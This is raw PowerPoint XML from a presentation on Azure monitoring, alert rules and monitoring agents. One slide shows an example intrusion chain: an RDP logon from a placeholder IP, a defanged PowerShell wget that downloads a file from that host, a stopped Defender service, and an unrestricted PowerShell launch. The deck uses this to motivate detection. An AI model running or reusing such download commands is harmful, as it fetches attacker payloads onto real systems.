        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718055" y="4949605"/>
            <a:ext cx="1614688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8.8.8.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Inbound</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>3389</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>svchost</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Country X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1935B7-3F85-4468-A853-281A246F52A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915293" y="4900631"/>
            <a:ext cx="609492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/>
              <a:t>8.8.8.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>4624 - An account </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>was successfully </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>logged on.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C87F45-E72D-49A8-975B-52F25ECA7104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5159877" y="4888307"/>
            <a:ext cx="21362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/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> hxxp://8.8.8[.]8:46613/VcEtrKighyIFS5foGNXH –file *.zip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185074-7C68-43B5-86C7-1FA2CAA27015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7919970" y="4911780"/>
            <a:ext cx="2136283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400"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>ervice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Stopped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>MpSense</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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34092E0-5B71-4DAE-9B27-F97E7F272A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10055717" y="4911023"/>
            <a:ext cx="21362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powershell.exe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ExecutionPolicy</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Unrestricted</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-Noninteractive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2975434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015C4-871D-414A-A6E3-384D85BDF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50" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0"/>
              <a:t>Set up proper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1"/>
              <a:t>monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2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6EE9F0-0BD4-BFBF-5C14-F075DA2F0C64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7626027" y="1797031"/>
            <a:ext cx="1736521" cy="716952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Resource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165D1E-B8B8-B550-38C0-9FB8653BD6C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506768" y="2513983"/>
            <a:ext cx="1736521" cy="968181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dirty="0"/>
              <a:t>Alert Rule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>«Network Flow over 90%»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>Severity 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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42C40BD-1B12-5C7E-6A1D-4FA1486305F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7626027" y="2770288"/>
            <a:ext cx="1736521" cy="716952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Condition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BA7372-ABF0-CBC7-E7E1-725AFED43218}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7832009" y="4911491"/>
            <a:ext cx="1215439" cy="487583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200" dirty="0"/>
              <a:t>Action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0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DDC32E16-A426-3D9D-74E3-63F822D0A33F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7307247" y="1690688"/>
            <a:ext cx="318780" cy="2672017"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 76755"/>
              <a:gd name="adj2" fmla="val 5026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5071ACE-844D-5268-135D-8F6651E6D3F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9946793" y="1797031"/>
            <a:ext cx="1736521" cy="716952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All VM’s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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DC71930-1BDE-4695-11CD-A73E0A1D9A64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9362548" y="2155507"/>
            <a:ext cx="58424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A8F3A-FF6E-7B1D-0E36-E29C4F97922C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9946793" y="2765212"/>
            <a:ext cx="1736521" cy="716952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400" i="1" dirty="0"/>
              <a:t>Inbound Flow Greater then 50/s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1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D89AD9C-EC50-9338-FC48-341DD544E4AB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9362548" y="3123688"/>
            <a:ext cx="584245" cy="5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0FDC92A-7C7C-3594-B5F5-766FBFEA662B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10097174" y="4911491"/>
            <a:ext cx="1215439" cy="487583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200" dirty="0"/>
              <a:t>Logic App</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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73D8AD5-B229-4318-3A6E-D81767C0631E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7832010" y="5602872"/>
            <a:ext cx="1215439" cy="487583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200" dirty="0"/>
              <a:t>Notification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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16AE39-81CD-2A16-4635-FB44C231DBC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10097175" y="5591653"/>
            <a:ext cx="1215439" cy="487583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200" dirty="0"/>
              <a:t>Email</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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628324-39B3-39CF-80BA-2920404C9EF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8736074" y="3635308"/>
            <a:ext cx="1736521" cy="716952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E75B0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b-NO" sz="1600" dirty="0"/>
              <a:t>Action Group</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600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3822601B-7EF5-4D58-5112-A4C0F65148D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9212748" y="2824832"/>
            <a:ext cx="716953" cy="3886201"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 76755"/>
              <a:gd name="adj2" fmla="val 4956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88698E0F-40F4-FE4E-98F8-331F8B0B4D73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9047448" y="5155283"/>
            <a:ext cx="10497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A8EC3B6-BB92-AD20-FBD1-456F0746E8CF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9047449" y="5835445"/>
            <a:ext cx="1049726" cy="112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7694304-0839-9E49-3E79-960155EC1E88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6367735" y="3482164"/>
            <a:ext cx="7294" cy="651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2" descr="Azure Resource Groups - Visual Studio Marketplace">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{962FED95-8956-8577-4D3C-F8F7E5A2B6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3434" y="4095264"/>
            <a:ext cx="743051" cy="743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8D876003-198A-48E7-5629-424FD3C6C9E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248968" y="1399074"/>
            <a:ext cx="5756241" cy="46913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nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alert Rules </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>made</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>monitoring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>upon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metrics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>events</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="1400" b="1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Resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  – Subscription, Resource Group </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or Resource	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="1600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Condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or Log Activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="1600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Action Group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– Notification or Action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="1600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Notification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – Epost, SMS or Voice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="1600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Action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – Azure Function, ITSM, Logic App, Webhook, Automation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alert Rules </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in a Resource Group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> live and die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0A1B39"/>
              </a:solidFill>
              <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0A1B39"/>
              </a:solidFill>
              <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0A1B39"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0A1B39"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0A1B39"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0A1B39"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0A1B39"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0A1B39"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TekstSylinder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6695E69-3B47-8AF1-783F-D4FE6B485446}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840476" y="6263214"/>
            <a:ext cx="609442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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Azure Monitor - Alert Notification via Teams - Microsoft Community Hub</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302292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B91D6-1930-EC68-8128-F1346845F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Log Analytics Agent vs Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Monitoring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> Agent (AMA)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Plassholder for tekst 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D97DCD-29E1-ADD6-893A-FAA8BDA30DEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609936" y="1553827"/>
            <a:ext cx="10749412" cy="4538931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="355600" indent="-355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 sz="18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25475" indent="-269875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b="0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04888" indent="-2857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 panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1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5213" indent="-17145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SzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="12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80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b-NO" b="1" dirty="0"/>
              <a:t>Azure Monitoring Agent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>(Supports Windows Clients, Windows Server 2022 and Azure Arc) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Has a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>higher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> EPM (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Events</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> Per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>minute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>) support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Custom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>collection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> logs)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Preview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>VM-Insight (basert på Service Map)  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Preview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Microsoft Defender for Cloud – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Preview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Microsoft Sentinel – Windows Security Events, DNS Logs, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Change Tracking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Preview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Network Watcher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>Preview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Azure Monitor vs Log Analytics</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Bilde 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CD44170-2E24-1166-D35F-8BBBD75C8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071" y="3803866"/>
            <a:ext cx="6895234" cy="1584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48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30565A5-B64D-0DBC-AAE6-B49DA38701E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501963" y="523610"/>
            <a:ext cx="11223198" cy="546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ts val="60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nb-NO" sz="2800" dirty="0"/>
